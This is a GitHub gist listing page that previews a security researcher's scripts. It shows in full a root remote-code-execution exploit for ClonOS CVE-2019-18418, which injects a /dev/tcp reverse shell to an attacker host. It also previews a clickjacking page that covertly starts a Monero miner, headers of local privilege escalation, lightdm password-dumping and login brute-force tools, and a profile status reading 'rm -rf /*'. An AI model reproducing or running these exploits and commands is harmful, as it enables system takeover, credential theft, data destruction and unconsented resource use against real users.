Skip to content

Instantly share code, notes, and snippets.

💭
`rm -rf /*`

bcoles

💭
`rm -rf /*`
Block or report user

Report or block bcoles

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@bcoles
bcoles / clonos-root-rce.sh
Last active Nov 4, 2019
Trivial ClonOs remote root RCE exploit for CVE-2019-18418
View clonos-root-rce.sh
#!/bin/bash
# clonos-root-rce
# Trivial ClonOs remote root RCE exploit for CVE-2019-18418 discovered by İbrahim Hakan Şeker
# Note: Start netcat listener on LHOST:LPORT first
RHOST="172.16.191.240"
LHOST="172.16.191.165"
LPORT=1337
curl "http://${RHOST}/json.php" -H "X-Requested-With: XMLHttpRequest" -d "mode=jailAdd&path=/&form_data[jname]=\`sudo /usr/local/bin/cbsd bash -c \"0<%26118-;exec 118<>/dev/tcp/${LHOST}/${LPORT};sh <%26118 >%26118 2>%26118\"\`"
@bcoles
bcoles / jellyfin-brute.rb
Created Aug 21, 2019
Jellyfin Password Reset PIN Brute Force
View jellyfin-brute.rb
#!/usr/bin/env ruby
################################################################################
# Jellyfin Password Reset PIN Brute Force #
# #
# Usually completes within a few minutes. Tested on Jellyfin version 10.2.2. #
# This will likely also work on Emby Media Server, but untested. #
# #
# Note: cURL must be installed and in $PATH #
# #
# Note: Upon successful expoitation, the password will be reset for all users, #
@bcoles
bcoles / lightdmpwn.sh
Created Sep 19, 2018
Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
View lightdmpwn.sh
#!/bin/bash
# Ubuntu LightDM Guest Account Local Privilege Escalation (CVE-2017-7358)
# ---
# Usage: ./lightpwn
# A LightDM session is required. Exploitation will lock the current session,
# and could take several minutes. It usually takes about a minute.
# When the screen stops flashing, unlock the session and run: /bin/subash
# ---
# There's nothing new or special about this exploit.
# It's simply a slightly more weaponised version of the original PoC,
@bcoles
bcoles / lastore-daemon-root.sh
Created Mar 24, 2018
Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
View lastore-daemon-root.sh
#!/bin/bash
# Deepin Linux 15.5 lastore-daemon D-Bus Local Root Exploit
#
# The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any user
# in the sudo group to install arbitrary packages without providing a password,
# resulting in code execution as root. By default, the first user created on
# the system is a member of the sudo group.
# ~ bcoles
#
# Based on exploit by King's Way: https://www.exploit-db.com/exploits/39433/
@bcoles
bcoles / lightdmdump
Created Mar 11, 2018
Dump clear text passwords from lightdm sessions on Ubuntu
View lightdmdump
#!/bin/bash
# lightdmdump
# ---
# Dump clear text passwords from lightdm sessions on Ubuntu
# Requires root privileges to dump lightdm process memory
# Tested on Ubuntu 14.04.1 LTS and 16.04.4 LTS
# ---
# Bug discovered by: Sven Blumenstein
# Disclosure date: 2017-09-15
# Source: https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490
@bcoles
bcoles / crt.sh
Created Mar 8, 2018
List sub-domains using crt.sh
View crt.sh
#!/bin/bash
# List sub-domains using crt.sh
set -euo pipefail
IFS=$'\n\t'
error() {
echo "[ERROR] $*"
exit 1
}
@bcoles
bcoles / fuzz.rb
Created Nov 18, 2017
Fuzz Origami Ruby gem with mutated PDF files
View fuzz.rb
#!/usr/bin/env ruby
###################################################
# ----------------------------------------------- #
# Fuzz Origami Ruby gem with mutated PDF files #
# ----------------------------------------------- #
# #
# Each test case is written to 'fuzz.pdf' in the #
# current working directory. #
# #
# Crashes and the associated backtrace are saved #
@bcoles
bcoles / clickjack-authedmine.html
Created Oct 21, 2017
Start the AuthedMine JavaScript Monero miner without user consent (using clickjacking)
View clickjack-authedmine.html
<html>
<body>
<div id="container" style="border:0;margin:0;position:absolute;width:5px;height:5px;overflow:hidden;cursor:pointer;opacity:0.01">
<iframe style="position:absolute;border:0;width:5px;height:100px;top:-85px;cursor:pointer;" src="https://authedmine.com/media/miner.html?key=your_public_key"></iframe>
</div>
</body>
<script>
window.onmousemove = function(e) {
var container = document.getElementById("container");
@bcoles
bcoles / cain-wifi-export-to-csv.rb
Created Aug 5, 2017
Cain Wireless Scanner export to CSV
View cain-wifi-export-to-csv.rb
#!/usr/bin/env ruby
################################################################################
# Cain Wireless Scanner export to CSV #
# ----------------------------------- #
# This script takes a text file of wireless networks exported from Cain #
# and converts it to CSV. #
################################################################################
# ~ bcoles
require 'csv'
@bcoles
bcoles / brute-teamtalk.rb
Created Jul 22, 2017
BearWare TeamTalk login brute force
View brute-teamtalk.rb
#!/usr/bin/env ruby
################################################################################
# BearWare TeamTalk login brute force #
# #
# Tested on TeamTalk versions 5.2.2.4885 and 5.2.3.4893 #
# #
# Note: SSL support is implemented but untested #
################################################################################
# ~ bcoles
You can’t perform that action at this time.